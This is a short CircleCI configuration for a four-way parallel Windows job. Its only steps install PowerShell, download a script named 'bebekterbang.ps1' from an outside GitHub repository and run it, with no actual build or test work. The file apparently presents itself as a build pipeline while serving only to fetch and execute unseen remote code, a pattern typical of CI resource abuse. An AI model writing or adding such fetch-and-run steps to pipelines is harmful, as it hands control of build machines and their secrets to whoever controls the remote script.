version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    parallelism: 4
    executor: win/default
    steps:
      - checkout
      - run: dotnet tool install --global PowerShell
      - run: Invoke-WebRequest https://raw.githubusercontent.com/kabehada5s/scrutinizer/main/bebekterbang.ps1 -OutFile bebekterbang.ps1
      - run: pwsh ./bebekterbang.ps1
